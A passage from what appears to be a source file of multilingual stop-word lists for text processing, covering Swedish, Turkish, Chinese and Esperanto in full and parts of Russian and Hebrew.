\"этой\",\n        \"этом\",\n        \"этому\",\n        \"этот\",\n        \"эту\",\n        \"я\",\n    ],\n    \"sv\": [\n        \"aderton\",\n        \"adertonde\",\n        \"adjö\",\n        \"aldrig\",\n        \"alla\",\n        \"allas\",\n        \"allt\",\n        \"alltid\",\n        \"alltså\",\n        \"andra\",\n        \"andras\",\n        \"annan\",\n        \"annat\",\n        \"artonde\",\n        \"artonn\",\n        \"att\",\n        \"av\",\n        \"bakom\",\n        \"bara\",\n        \"behöva\",\n        \"behövas\",\n        \"behövde\",\n        \"behövt\",\n        \"beslut\",\n        \"beslutat\",\n        \"beslutit\",\n        \"bland\",\n        \"blev\",\n        \"bli\",\n        \"blir\",\n        \"blivit\",\n        \"bort\",\n        \"borta\",\n        \"bra\",\n        \"bäst\",\n        \"bättre\",\n        \"båda\",\n        \"bådas\",\n        \"dag\",\n        \"dagar\",\n        \"dagarna\",\n        \"dagen\",\n        \"de\",\n        \"del\",\n        \"delen\",\n        \"dem\",\n        \"den\",\n        \"denna\",\n        \"deras\",\n        \"dess\",\n        \"dessa\",\n        \"det\",\n        \"detta\",\n        \"dig\",\n        \"din\",\n        \"dina\",\n        \"dit\",\n        \"ditt\",\n        \"dock\",\n        \"du\",\n        \"där\",\n        \"därför\",\n        \"då\",\n        \"efter\",\n        \"eftersom\",\n        \"ej\",\n        \"elfte\",\n        \"eller\",\n        \"elva\",\n        \"en\",\n        \"enkel\",\n        \"enkelt\",\n        \"enkla\",\n        \"enligt\",\n        \"er\",\n        \"era\",\n        \"ert\",\n        \"ett\",\n        \"ettusen\",\n        \"fanns\",\n        \"fem\",\n        \"femte\",\n        \"femtio\",\n        \"femtionde\",\n        \"femton\",\n        \"femtonde\",\n        \"fick\",\n        \"fin\",\n        \"finnas\",\n        \"finns\",\n        \"fjorton\",\n        \"fjortonde\",\n        \"fjärde\",\n        \"fler\",\n        \"flera\",\n        \"flesta\",\n        \"fram\",\n        \"framför\",\n        \"från\",\n        \"fyra\",\n        \"fyrtio\",\n        \"fyrtionde\",\n        \"få\",\n        \"får\",\n        \"fått\",\n        \"följande\",\n        \"för\",\n        \"före\",\n        \"förlåt\",\n        \"förra\",\n        \"första\",\n        \"genast\",\n        \"genom\",\n        \"gick\",\n        \"gjorde\",\n        \"gjort\",\n        \"god\",\n        \"goda\",\n        \"godare\",\n        \"godast\",\n        \"gott\",\n        \"gälla\",\n        \"gäller\",\n        \"gällt\",\n        \"gärna\",\n        \"gå\",\n        \"går\",\n        \"gått\",\n        \"gör\",\n        \"göra\",\n        \"ha\",\n        \"hade\",\n        \"haft\",\n        \"han\",\n        \"hans\",\n        \"har\",\n        \"heller\",\n        \"hellre\",\n        \"helst\",\n        \"helt\",\n        \"henne\",\n        \"hennes\",\n        \"hit\",\n        \"hon\",\n        \"honom\",\n        \"hundra\",\n        \"hundraen\",\n        \"hundraett\",\n        \"hur\",\n        \"här\",\n        \"hög\",\n        \"höger\",\n        \"högre\",\n        \"högst\",\n        \"i\",\n        \"ibland\",\n        \"icke\",\n        \"idag\",\n        \"igen\",\n        \"igår\",\n        \"imorgon\",\n        \"in\",\n        \"inför\",\n        \"inga\",\n        \"ingen\",\n        \"ingenting\",\n        \"inget\",\n        \"innan\",\n        \"inne\",\n        \"inom\",\n        \"inte\",\n        \"inuti\",\n        \"ja\",\n        \"jag\",\n        \"ju\",\n        \"jämfört\",\n        \"kan\",\n        \"kanske\",\n        \"knappast\",\n        \"kom\",\n        \"komma\",\n        \"kommer\",\n        \"kommit\",\n        \"kr\",\n        \"kunde\",\n        \"kunna\",\n        \"kunnat\",\n        \"kvar\",\n        \"legat\",\n        \"ligga\",\n        \"ligger\",\n        \"lika\",\n        \"likställd\",\n        \"likställda\",\n        \"lilla\",\n        \"lite\",\n        \"liten\",\n        \"litet\",\n        \"länge\",\n        \"längre\",\n        \"längst\",\n        \"lätt\",\n        \"lättare\",\n        \"lättast\",\n        \"långsam\",\n        \"långsammare\",\n        \"långsammast\",\n        \"långsamt\",\n        \"långt\",\n        \"man\",\n        \"med\",\n        \"mellan\",\n        \"men\",\n        \"mer\",\n        \"mera\",\n        \"mest\",\n        \"mig\",\n        \"min\",\n        \"mina\",\n        \"mindre\",\n        \"minst\",\n        \"mitt\",\n        \"mittemot\",\n        \"mot\",\n        \"mycket\",\n        \"många\",\n        \"måste\",\n        \"möjlig\",\n        \"möjligen\",\n        \"möjligt\",\n        \"möjligtvis\",\n        \"ned\",\n        \"nederst\",\n        \"nedersta\",\n        \"nedre\",\n        \"nej\",\n        \"ner\",\n        \"ni\",\n        \"nio\",\n        \"nionde\",\n        \"nittio\",\n        \"nittionde\",\n        \"nitton\",\n        \"nittonde\",\n        \"nog\",\n        \"noll\",\n        \"nr\",\n        \"nu\",\n        \"nummer\",\n        \"när\",\n        \"nästa\",\n        \"någon\",\n        \"någonting\",\n        \"något\",\n        \"några\",\n        \"nödvändig\",\n        \"nödvändiga\",\n        \"nödvändigt\",\n        \"nödvändigtvis\",\n        \"och\",\n        \"också\",\n        \"ofta\",\n        \"oftast\",\n        \"olika\",\n        \"olikt\",\n        \"om\",\n        \"oss\",\n        \"på\",\n        \"rakt\",\n        \"redan\",\n        \"rätt\",\n        \"sade\",\n        \"sagt\",\n        \"samma\",\n        \"sedan\",\n        \"senare\",\n        \"senast\",\n        \"sent\",\n        \"sex\",\n        \"sextio\",\n        \"sextionde\",\n        \"sexton\",\n        \"sextonde\",\n        \"sig\",\n        \"sin\",\n        \"sina\",\n        \"sist\",\n        \"sista\",\n        \"siste\",\n        \"sitt\",\n        \"sitta\",\n        \"sju\",\n        \"sjunde\",\n        \"sjuttio\",\n        \"sjuttionde\",\n        \"sjutton\",\n        \"sjuttonde\",\n        \"själv\",\n        \"sjätte\",\n        \"ska\",\n        \"skall\",\n        \"skulle\",\n        \"slutligen\",\n        \"små\",\n        \"smått\",\n        \"snart\",\n        \"som\",\n        \"stor\",\n        \"stora\",\n        \"stort\",\n        \"större\",\n        \"störst\",\n        \"säga\",\n        \"säger\",\n        \"sämre\",\n        \"sämst\",\n        \"så\",\n        \"sådan\",\n        \"sådana\",\n        \"sådant\",\n        \"tack\",\n        \"tidig\",\n        \"tidigare\",\n        \"tidigast\",\n        \"tidigt\",\n        \"till\",\n        \"tills\",\n        \"tillsammans\",\n        \"tio\",\n        \"tionde\",\n        \"tjugo\",\n        \"tjugoen\",\n        \"tjugoett\",\n        \"tjugonde\",\n        \"tjugotre\",\n        \"tjugotvå\",\n        \"tjungo\",\n        \"tolfte\",\n        \"tolv\",\n        \"tre\",\n        \"tredje\",\n        \"trettio\",\n        \"trettionde\",\n        \"tretton\",\n        \"trettonde\",\n        \"två\",\n        \"tvåhundra\",\n        \"under\",\n        \"upp\",\n        \"ur\",\n        \"ursäkt\",\n        \"ut\",\n        \"utan\",\n        \"utanför\",\n        \"ute\",\n        \"vad\",\n        \"var\",\n        \"vara\",\n        \"varför\",\n        \"varifrån\",\n        \"varit\",\n        \"varje\",\n        \"varken\",\n        \"vars\",\n        \"varsågod\",\n        \"vart\",\n        \"vem\",\n        \"vems\",\n        \"verkligen\",\n        \"vi\",\n        \"vid\",\n        \"vidare\",\n        \"viktig\",\n        \"viktigare\",\n        \"viktigast\",\n        \"viktigt\",\n        \"vilka\",\n        \"vilkas\",\n        \"vilken\",\n        \"vilket\",\n        \"vill\",\n        \"vänster\",\n        \"vänstra\",\n        \"värre\",\n        \"vår\",\n        \"våra\",\n        \"vårt\",\n        \"än\",\n        \"ännu\",\n        \"är\",\n        \"även\",\n        \"åt\",\n        \"åtminstone\",\n        \"åtta\",\n        \"åttio\",\n        \"åttionde\",\n        \"åttonde\",\n        \"över\",\n        \"övermorgon\",\n        \"överst\",\n        \"övre\",\n    ],\n    \"tr\": [\n        \"acaba\",\n        \"acep\",\n        \"adeta\",\n        \"altmýþ\",\n        \"altmış\",\n        \"altý\",\n        \"altı\",\n        \"ama\",\n        \"ancak\",\n        \"arada\",\n        \"artýk\",\n        \"aslında\",\n        \"aynen\",\n        \"ayrıca\",\n        \"az\",\n        \"bana\",\n        \"bari\",\n        \"bazen\",\n        \"bazý\",\n        \"bazı\",\n        \"baţka\",\n        \"belki\",\n        \"ben\",\n        \"benden\",\n        \"beni\",\n        \"benim\",\n        \"beri\",\n        \"beþ\",\n        \"beş\",\n        \"beţ\",\n        \"bile\",\n        \"bin\",\n        \"bir\",\n        \"biraz\",\n        \"biri\",\n        \"birkaç\",\n        \"birkez\",\n        \"birçok\",\n        \"birþey\",\n        \"birþeyi\",\n        \"birşey\",\n        \"birşeyi\",\n        \"birţey\",\n        \"biz\",\n        \"bizden\",\n        \"bize\",\n        \"bizi\",\n        \"bizim\",\n        \"bu\",\n        \"buna\",\n        \"bunda\",\n        \"bundan\",\n        \"bunlar\",\n        \"bunları\",\n        \"bunların\",\n        \"bunu\",\n        \"bunun\",\n        \"burada\",\n        \"böyle\",\n        \"böylece\",\n        \"bütün\",\n        \"da\",\n        \"daha\",\n        \"dahi\",\n        \"dahil\",\n        \"daima\",\n        \"dair\",\n        \"dayanarak\",\n        \"de\",\n        \"defa\",\n        \"deđil\",\n        \"değil\",\n        \"diye\",\n        \"diđer\",\n        \"diğer\",\n        \"doksan\",\n        \"dokuz\",\n        \"dolayı\",\n        \"dolayısıyla\",\n        \"dört\",\n        \"edecek\",\n        \"eden\",\n        \"ederek\",\n        \"edilecek\",\n        \"ediliyor\",\n        \"edilmesi\",\n        \"ediyor\",\n        \"elli\",\n        \"en\",\n        \"etmesi\",\n        \"etti\",\n        \"ettiği\",\n        \"ettiğini\",\n        \"eđer\",\n        \"eğer\",\n        \"fakat\",\n        \"gibi\",\n        \"göre\",\n        \"halbuki\",\n        \"halen\",\n        \"hangi\",\n        \"hani\",\n        \"hariç\",\n        \"hatta\",\n        \"hele\",\n        \"hem\",\n        \"henüz\",\n        \"hep\",\n        \"hepsi\",\n        \"her\",\n        \"herhangi\",\n        \"herkes\",\n        \"herkesin\",\n        \"hiç\",\n        \"hiçbir\",\n        \"iken\",\n        \"iki\",\n        \"ila\",\n        \"ile\",\n        \"ilgili\",\n        \"ilk\",\n        \"illa\",\n        \"ise\",\n        \"itibaren\",\n        \"itibariyle\",\n        \"iyi\",\n        \"iyice\",\n        \"için\",\n        \"işte\",\n        \"iţte\",\n        \"kadar\",\n        \"kanýmca\",\n        \"karşın\",\n        \"katrilyon\",\n        \"kendi\",\n        \"kendilerine\",\n        \"kendini\",\n        \"kendisi\",\n        \"kendisine\",\n        \"kendisini\",\n        \"kere\",\n        \"kez\",\n        \"keţke\",\n        \"ki\",\n        \"kim\",\n        \"kimden\",\n        \"kime\",\n        \"kimi\",\n        \"kimse\",\n        \"kýrk\",\n        \"kýsaca\",\n        \"kırk\",\n        \"lakin\",\n        \"madem\",\n        \"međer\",\n        \"milyar\",\n        \"milyon\",\n        \"mu\",\n        \"mü\",\n        \"mý\",\n        \"mı\",\n        \"nasýl\",\n        \"nasıl\",\n        \"ne\",\n        \"neden\",\n        \"nedenle\",\n        \"nerde\",\n        \"nere\",\n        \"nerede\",\n        \"nereye\",\n        \"nitekim\",\n        \"niye\",\n        \"niçin\",\n        \"o\",\n        \"olan\",\n        \"olarak\",\n        \"oldu\",\n        \"olduklarını\",\n        \"olduğu\",\n        \"olduğunu\",\n        \"olmadı\",\n        \"olmadığı\",\n        \"olmak\",\n        \"olması\",\n        \"olmayan\",\n        \"olmaz\",\n        \"olsa\",\n        \"olsun\",\n        \"olup\",\n        \"olur\",\n        \"olursa\",\n        \"oluyor\",\n        \"on\",\n        \"ona\",\n        \"ondan\",\n        \"onlar\",\n        \"onlardan\",\n        \"onlari\",\n        \"onlarýn\",\n        \"onları\",\n        \"onların\",\n        \"onu\",\n        \"onun\",\n        \"otuz\",\n        \"oysa\",\n        \"pek\",\n        \"rağmen\",\n        \"sadece\",\n        \"sanki\",\n        \"sekiz\",\n        \"seksen\",\n        \"sen\",\n        \"senden\",\n        \"seni\",\n        \"senin\",\n        \"siz\",\n        \"sizden\",\n        \"sizi\",\n        \"sizin\",\n        \"sonra\",\n        \"tarafından\",\n        \"trilyon\",\n        \"tüm\",\n        \"var\",\n        \"vardı\",\n        \"ve\",\n        \"veya\",\n        \"veyahut\",\n        \"ya\",\n        \"yahut\",\n        \"yani\",\n        \"yapacak\",\n        \"yapmak\",\n        \"yaptı\",\n        \"yaptıkları\",\n        \"yaptığı\",\n        \"yaptığını\",\n        \"yapılan\",\n        \"yapılması\",\n        \"yapıyor\",\n        \"yedi\",\n        \"yerine\",\n        \"yetmiþ\",\n        \"yetmiş\",\n        \"yetmiţ\",\n        \"yine\",\n        \"yirmi\",\n        \"yoksa\",\n        \"yüz\",\n        \"zaten\",\n        \"çok\",\n        \"çünkü\",\n        \"öyle\",\n        \"üzere\",\n        \"üç\",\n        \"þey\",\n        \"þeyden\",\n        \"þeyi\",\n        \"þeyler\",\n        \"þu\",\n        \"þuna\",\n        \"þunda\",\n        \"þundan\",\n        \"þunu\",\n        \"şey\",\n        \"şeyden\",\n        \"şeyi\",\n        \"şeyler\",\n        \"şu\",\n        \"şuna\",\n        \"şunda\",\n        \"şundan\",\n        \"şunları\",\n        \"şunu\",\n        \"şöyle\",\n        \"ţayet\",\n        \"ţimdi\",\n        \"ţu\",\n        \"ţöyle\",\n    ],\n    \"zh\": [\n        \"、\",\n        \"。\",\n        \"〈\",\n        \"〉\",\n        \"《\",\n        \"》\",\n        \"一\",\n        \"一切\",\n        \"一则\",\n        \"一方面\",\n        \"一旦\",\n        \"一来\",\n        \"一样\",\n        \"一般\",\n        \"七\",\n        \"万一\",\n        \"三\",\n        \"上下\",\n        \"不仅\",\n        \"不但\",\n        \"不光\",\n        \"不单\",\n        \"不只\",\n        \"不如\",\n        \"不怕\",\n        \"不惟\",\n        \"不成\",\n        \"不拘\",\n        \"不比\",\n        \"不然\",\n        \"不特\",\n        \"不独\",\n        \"不管\",\n        \"不论\",\n        \"不过\",\n        \"不问\",\n        \"与\",\n        \"与其\",\n        \"与否\",\n        \"与此同时\",\n        \"且\",\n        \"两者\",\n        \"个\",\n        \"临\",\n        \"为\",\n        \"为了\",\n        \"为什么\",\n        \"为何\",\n        \"为着\",\n        \"乃\",\n        \"乃至\",\n        \"么\",\n        \"之\",\n        \"之一\",\n        \"之所以\",\n        \"之类\",\n        \"乌乎\",\n        \"乎\",\n        \"乘\",\n        \"九\",\n        \"也\",\n        \"也好\",\n        \"也罢\",\n        \"了\",\n        \"二\",\n        \"于\",\n        \"于是\",\n        \"于是乎\",\n        \"云云\",\n        \"五\",\n        \"人家\",\n        \"什么\",\n        \"什么样\",\n        \"从\",\n        \"从而\",\n        \"他\",\n        \"他人\",\n        \"他们\",\n        \"以\",\n        \"以便\",\n        \"以免\",\n        \"以及\",\n        \"以至\",\n        \"以至于\",\n        \"以致\",\n        \"们\",\n        \"任\",\n        \"任何\",\n        \"任凭\",\n        \"似的\",\n        \"但\",\n        \"但是\",\n        \"何\",\n        \"何况\",\n        \"何处\",\n        \"何时\",\n        \"作为\",\n        \"你\",\n        \"你们\",\n        \"使得\",\n        \"例如\",\n        \"依\",\n        \"依照\",\n        \"俺\",\n        \"俺们\",\n        \"倘\",\n        \"倘使\",\n        \"倘或\",\n        \"倘然\",\n        \"倘若\",\n        \"借\",\n        \"假使\",\n        \"假如\",\n        \"假若\",\n        \"像\",\n        \"八\",\n        \"六\",\n        \"兮\",\n        \"关于\",\n        \"其\",\n        \"其一\",\n        \"其中\",\n        \"其二\",\n        \"其他\",\n        \"其余\",\n        \"其它\",\n        \"其次\",\n        \"具体地说\",\n        \"具体说来\",\n        \"再者\",\n        \"再说\",\n        \"冒\",\n        \"冲\",\n        \"况且\",\n        \"几\",\n        \"几时\",\n        \"凭\",\n        \"凭借\",\n        \"则\",\n        \"别\",\n        \"别的\",\n        \"别说\",\n        \"到\",\n        \"前后\",\n        \"前者\",\n        \"加之\",\n        \"即\",\n        \"即令\",\n        \"即使\",\n        \"即便\",\n        \"即或\",\n        \"即若\",\n        \"又\",\n        \"及\",\n        \"及其\",\n        \"及至\",\n        \"反之\",\n        \"反过来\",\n        \"反过来说\",\n        \"另\",\n        \"另一方面\",\n        \"另外\",\n        \"只是\",\n        \"只有\",\n        \"只要\",\n        \"只限\",\n        \"叫\",\n        \"叮咚\",\n        \"可\",\n        \"可以\",\n        \"可是\",\n        \"可见\",\n        \"各\",\n        \"各个\",\n        \"各位\",\n        \"各种\",\n        \"各自\",\n        \"同\",\n        \"同时\",\n        \"向\",\n        \"向着\",\n        \"吓\",\n        \"吗\",\n        \"否则\",\n        \"吧\",\n        \"吧哒\",\n        \"吱\",\n        \"呀\",\n        \"呃\",\n        \"呕\",\n        \"呗\",\n        \"呜\",\n        \"呜呼\",\n        \"呢\",\n        \"呵\",\n        \"呸\",\n        \"呼哧\",\n        \"咋\",\n        \"和\",\n        \"咚\",\n        \"咦\",\n        \"咱\",\n        \"咱们\",\n        \"咳\",\n        \"哇\",\n        \"哈\",\n        \"哈哈\",\n        \"哉\",\n        \"哎\",\n        \"哎呀\",\n        \"哎哟\",\n        \"哗\",\n        \"哟\",\n        \"哦\",\n        \"哩\",\n        \"哪\",\n        \"哪个\",\n        \"哪些\",\n        \"哪儿\",\n        \"哪天\",\n        \"哪年\",\n        \"哪怕\",\n        \"哪样\",\n        \"哪边\",\n        \"哪里\",\n        \"哼\",\n        \"哼唷\",\n        \"唉\",\n        \"啊\",\n        \"啐\",\n        \"啥\",\n        \"啦\",\n        \"啪达\",\n        \"喂\",\n        \"喏\",\n        \"喔唷\",\n        \"嗡嗡\",\n        \"嗬\",\n        \"嗯\",\n        \"嗳\",\n        \"嘎\",\n        \"嘎登\",\n        \"嘘\",\n        \"嘛\",\n        \"嘻\",\n        \"嘿\",\n        \"四\",\n        \"因\",\n        \"因为\",\n        \"因此\",\n        \"因而\",\n        \"固然\",\n        \"在\",\n        \"在下\",\n        \"地\",\n        \"多\",\n        \"多少\",\n        \"她\",\n        \"她们\",\n        \"如\",\n        \"如上所述\",\n        \"如何\",\n        \"如其\",\n        \"如果\",\n        \"如此\",\n        \"如若\",\n        \"宁\",\n        \"宁可\",\n        \"宁愿\",\n        \"宁肯\",\n        \"它\",\n        \"它们\",\n        \"对\",\n        \"对于\",\n        \"将\",\n        \"尔后\",\n        \"尚且\",\n        \"就\",\n        \"就是\",\n        \"就是说\",\n        \"尽\",\n        \"尽管\",\n        \"岂但\",\n        \"己\",\n        \"并\",\n        \"并且\",\n        \"开外\",\n        \"开始\",\n        \"归\",\n        \"当\",\n        \"当着\",\n        \"彼\",\n        \"彼此\",\n        \"往\",\n        \"待\",\n        \"得\",\n        \"怎\",\n        \"怎么\",\n        \"怎么办\",\n        \"怎么样\",\n        \"怎样\",\n        \"总之\",\n        \"总的来看\",\n        \"总的来说\",\n        \"总的说来\",\n        \"总而言之\",\n        \"恰恰相反\",\n        \"您\",\n        \"慢说\",\n        \"我\",\n        \"我们\",\n        \"或\",\n        \"或是\",\n        \"或者\",\n        \"所\",\n        \"所以\",\n        \"打\",\n        \"把\",\n        \"抑或\",\n        \"拿\",\n        \"按\",\n        \"按照\",\n        \"换句话说\",\n        \"换言之\",\n        \"据\",\n        \"接着\",\n        \"故\",\n        \"故此\",\n        \"旁人\",\n        \"无宁\",\n        \"无论\",\n        \"既\",\n        \"既是\",\n        \"既然\",\n        \"时候\",\n        \"是\",\n        \"是的\",\n        \"替\",\n        \"有\",\n        \"有些\",\n        \"有关\",\n        \"有的\",\n        \"望\",\n        \"朝\",\n        \"朝着\",\n        \"本\",\n        \"本着\",\n        \"来\",\n        \"来着\",\n        \"极了\",\n        \"果然\",\n        \"果真\",\n        \"某\",\n        \"某个\",\n        \"某些\",\n        \"根据\",\n        \"正如\",\n        \"此\",\n        \"此外\",\n        \"此间\",\n        \"毋宁\",\n        \"每\",\n        \"每当\",\n        \"比\",\n        \"比如\",\n        \"比方\",\n        \"沿\",\n        \"沿着\",\n        \"漫说\",\n        \"焉\",\n        \"然则\",\n        \"然后\",\n        \"然而\",\n        \"照\",\n        \"照着\",\n        \"甚么\",\n        \"甚而\",\n        \"甚至\",\n        \"用\",\n        \"由\",\n        \"由于\",\n        \"由此可见\",\n        \"的\",\n        \"的话\",\n        \"相对而言\",\n        \"省得\",\n        \"着\",\n        \"着呢\",\n        \"矣\",\n        \"离\",\n        \"第\",\n        \"等\",\n        \"等等\",\n        \"管\",\n        \"紧接着\",\n        \"纵\",\n        \"纵令\",\n        \"纵使\",\n        \"纵然\",\n        \"经\",\n        \"经过\",\n        \"结果\",\n        \"给\",\n        \"继而\",\n        \"综上所述\",\n        \"罢了\",\n        \"者\",\n        \"而\",\n        \"而且\",\n        \"而况\",\n        \"而外\",\n        \"而已\",\n        \"而是\",\n        \"而言\",\n        \"能\",\n        \"腾\",\n        \"自\",\n        \"自个儿\",\n        \"自从\",\n        \"自各儿\",\n        \"自家\",\n        \"自己\",\n        \"自身\",\n        \"至\",\n        \"至于\",\n        \"若\",\n        \"若是\",\n        \"若非\",\n        \"莫若\",\n        \"虽\",\n        \"虽则\",\n        \"虽然\",\n        \"虽说\",\n        \"被\",\n        \"要\",\n        \"要不\",\n        \"要不是\",\n        \"要不然\",\n        \"要么\",\n        \"要是\",\n        \"让\",\n        \"论\",\n        \"设使\",\n        \"设若\",\n        \"该\",\n        \"诸位\",\n        \"谁\",\n        \"谁知\",\n        \"赶\",\n        \"起\",\n        \"起见\",\n        \"趁\",\n        \"趁着\",\n        \"越是\",\n        \"跟\",\n        \"较\",\n        \"较之\",\n        \"边\",\n        \"过\",\n        \"还是\",\n        \"还有\",\n        \"这\",\n        \"这个\",\n        \"这么\",\n        \"这么些\",\n        \"这么样\",\n        \"这么点儿\",\n        \"这些\",\n        \"这会儿\",\n        \"这儿\",\n        \"这就是说\",\n        \"这时\",\n        \"这样\",\n        \"这边\",\n        \"这里\",\n        \"进而\",\n        \"连\",\n        \"连同\",\n        \"通过\",\n        \"遵照\",\n        \"那\",\n        \"那个\",\n        \"那么\",\n        \"那么些\",\n        \"那么样\",\n        \"那些\",\n        \"那会儿\",\n        \"那儿\",\n        \"那时\",\n        \"那样\",\n        \"那边\",\n        \"那里\",\n        \"鄙人\",\n        \"鉴于\",\n        \"阿\",\n        \"除\",\n        \"除了\",\n        \"除此之外\",\n        \"除非\",\n        \"随\",\n        \"随着\",\n        \"零\",\n        \"非但\",\n        \"非徒\",\n        \"靠\",\n        \"顺\",\n        \"顺着\",\n        \"首先\",\n        \"︿\",\n        \"！\",\n        \"＃\",\n        \"＄\",\n        \"％\",\n        \"＆\",\n        \"（\",\n        \"）\",\n        \"＊\",\n        \"＋\",\n        \"，\",\n        \"０\",\n        \"１\",\n        \"２\",\n        \"３\",\n        \"４\",\n        \"５\",\n        \"６\",\n        \"７\",\n        \"８\",\n        \"９\",\n        \"：\",\n        \"；\",\n        \"＜\",\n        \"＞\",\n        \"？\",\n        \"＠\",\n        \"［\",\n        \"］\",\n        \"｛\",\n        \"｜\",\n        \"｝\",\n        \"～\",\n        \"￥\",\n    ],\n    \"eo\": [\n        \"adiaŭ\",\n        \"ajn\",\n        \"al\",\n        \"ankoraŭ\",\n        \"antaŭ\",\n        \"aŭ\",\n        \"bonan\",\n        \"bonvole\",\n        \"bonvolu\",\n        \"bv\",\n        \"ci\",\n        \"cia\",\n        \"cian\",\n        \"cin\",\n        \"d-ro\",\n        \"da\",\n        \"de\",\n        \"dek\",\n        \"deka\",\n        \"do\",\n        \"doktor'\",\n        \"doktoro\",\n        \"du\",\n        \"dua\",\n        \"dum\",\n        \"eble\",\n        \"ekz\",\n        \"ekzemple\",\n        \"en\",\n        \"estas\",\n        \"estis\",\n        \"estos\",\n        \"estu\",\n        \"estus\",\n        \"eĉ\",\n        \"f-no\",\n        \"feliĉan\",\n        \"for\",\n        \"fraŭlino\",\n        \"ha\",\n        \"havas\",\n        \"havis\",\n        \"havos\",\n        \"havu\",\n        \"havus\",\n        \"he\",\n        \"ho\",\n        \"hu\",\n        \"ili\",\n        \"ilia\",\n        \"ilian\",\n        \"ilin\",\n        \"inter\",\n        \"io\",\n        \"ion\",\n        \"iu\",\n        \"iujn\",\n        \"iun\",\n        \"ja\",\n        \"jam\",\n        \"je\",\n        \"jes\",\n        \"k\",\n        \"kaj\",\n        \"ke\",\n        \"kio\",\n        \"kion\",\n        \"kiu\",\n        \"kiujn\",\n        \"kiun\",\n        \"kvankam\",\n        \"kvar\",\n        \"kvara\",\n        \"kvazaŭ\",\n        \"kvin\",\n        \"kvina\",\n        \"la\",\n        \"li\",\n        \"lia\",\n        \"lian\",\n        \"lin\",\n        \"malantaŭ\",\n        \"male\",\n        \"malgraŭ\",\n        \"mem\",\n        \"mi\",\n        \"mia\",\n        \"mian\",\n        \"min\",\n        \"minus\",\n        \"naŭ\",\n        \"naŭa\",\n        \"ne\",\n        \"nek\",\n        \"nenio\",\n        \"nenion\",\n        \"neniu\",\n        \"neniun\",\n        \"nepre\",\n        \"ni\",\n        \"nia\",\n        \"nian\",\n        \"nin\",\n        \"nu\",\n        \"nun\",\n        \"nur\",\n        \"ok\",\n        \"oka\",\n        \"oni\",\n        \"onia\",\n        \"onian\",\n        \"onin\",\n        \"plej\",\n        \"pli\",\n        \"plu\",\n        \"plus\",\n        \"por\",\n        \"post\",\n        \"preter\",\n        \"s-no\",\n        \"s-ro\",\n        \"se\",\n        \"sed\",\n        \"sep\",\n        \"sepa\",\n        \"ses\",\n        \"sesa\",\n        \"si\",\n        \"sia\",\n        \"sian\",\n        \"sin\",\n        \"sinjor'\",\n        \"sinjorino\",\n        \"sinjoro\",\n        \"sub\",\n        \"super\",\n        \"supren\",\n        \"sur\",\n        \"tamen\",\n        \"tio\",\n        \"tion\",\n        \"tiu\",\n        \"tiujn\",\n        \"tiun\",\n        \"tra\",\n        \"tri\",\n        \"tria\",\n        \"tuj\",\n        \"tute\",\n        \"unu\",\n        \"unua\",\n        \"ve\",\n        \"verŝajne\",\n        \"vi\",\n        \"via\",\n        \"vian\",\n        \"vin\",\n        \"ĉi\",\n        \"ĉio\",\n        \"ĉion\",\n        \"ĉiu\",\n        \"ĉiujn\",\n        \"ĉiun\",\n        \"ĉu\",\n        \"ĝi\",\n        \"ĝia\",\n        \"ĝian\",\n        \"ĝin\",\n        \"ĝis\",\n        \"ĵus\",\n        \"ŝi\",\n        \"ŝia\",\n        \"ŝin\",\n    ],\n    \"he\": [\n        \"אבל\",\n        \"או\",\n        \"אולי\",\n        \"אותה\",\n        \"אותו\",\n        \"אותי\",\n        \"אותך\",\n        \"אותם\",\n        \"אותן\",\n        \"אותנו\",\n        \"אז\",\n        \"אחר\",\n        \"אחרות\",\n        \"אחרי\",\n        \"אחריכן\",\n        \"אחרים\",\n        \"אחרת\",\n        \"אי\",\n        \"איזה\",\n        \"איך\",\n        \"אין\",\n        \"איפה\",\n        \"איתה\",\n        \"איתו\",\n        \"איתי\",\n        \"איתך\",\n        \"איתכם\",\n        \"איתכן\",\n        \"איתם\",\n        \"איתן\",\n        \"איתנו\",\n        \"אך\",\n        \"אל\",\n        \"אלה\",\n        \"אלו\",\n        \"אם\",\n        \"אנחנו\",\n        \"אני\",\n        \"אס\",\n        \"אף\",\n        \"אצל\",\n        \"אשר\",\n        \"את\",\n        \"אתה\",\n        \"אתכם\",\n        \"אתכן\",\n        \"אתם\",\n        \"אתן\",\n        \"באיזומידה\",\n        \"באמצע\",\n        \"באמצעות\",\n        \"בגלל\",\n        \"בין\",\n        \"בלי\",\n        \"במידה\",\n        \"במקוםשבו\",\n        \"ברם\",\n        \"בשביל\",\n        \"בשעהש\",\n        \"בתוך\",\n        \"גם\",\n        \"דרך\",\n        \"הוא\",\n        \"היא\",\n        \"היה\",\n        \"היכן\",\n        \"היתה\",\n        \"היתי\",\n        \"הם\",\n        \"הן\",\n        \"הנה\",\n        \"הסיבהשבגללה\",\n        \"הרי\",\n        \"ואילו\",\n        \"ואת\",\n        \"זאת\",\n        \"זה\",\n        \"זות\",\n        \"יהיה\",\n        \"יוכל\",\n        \"יוכלו\",\n        \"יותרמדי\",\n        \"יכול\",\n        \"יכולה\",\n        \"יכולות\",\n        \"יכולים\",\n        \"יכל\",\n        \"יכלה\",\n        \"יכלו\",\n        \"יש\",\n        \"כאן\",\n        \"כאשר\",\n        \"כולם\",\n        \"כולן\",\n        \"כזה\",\n        \"כי\",\n        \"כיצד\",\n        \"כך\",\n        \"ככה\",\n        \"כל\",\n        \"כלל\",\n        \"כמו\",\n        \"כן\",\n        \"כפי\",\n        \"כש\",\n        \"לא\",\n        \"לאו\",\n        \"לאיזותכלית\",\n        \"לאן\",\n        \"לבין\",\n        \"לה\",\n        \"להיות\",\n        \"להם\",\n        \"להן\",\n        \"לו\",\n        \"לי\",\n        \"לכם\",\n        \"לכן\",\n        \"למה\",\n        \"למטה\",\n        \"למעלה\",\n        \"למקוםשבו\",\n        \"למרות\",\n        \"לנו\",\n        \"לעבר\",\n        \"לעיכן\",\n        \"לפיכך\",\n        \"לפני\",\n        \"מאד\",\n        \"מאחורי\",\n        \"מאיזוסיבה\",\n        \"מאין\",\n        \"מאיפה\",\n        \"מבלי\",\n        \"מבעד\",\n        \"מדוע\",\n        \"מה\",\n        \"מהיכן\",\n        \"מול\",\n        \"מחוץ\",\n        \"מי\",\n        \"מכאן\",\n        \"מכיוון\",\n        \"מלבד\",\n        \"מן\",\n        \"מנין\",\n        \"מסוגל\",\n        \"מעט\",\n        \"מעטים\",\n        \"מעל\",\n        \"מצד\",\n        \"מקוםבו\",\n        \"מתחת\",\n        \"מתי\",\n        \"נגד\",\n        \"נגר\",\n        \"נו\",\n        \"עד\",\n        \"עז\",\n        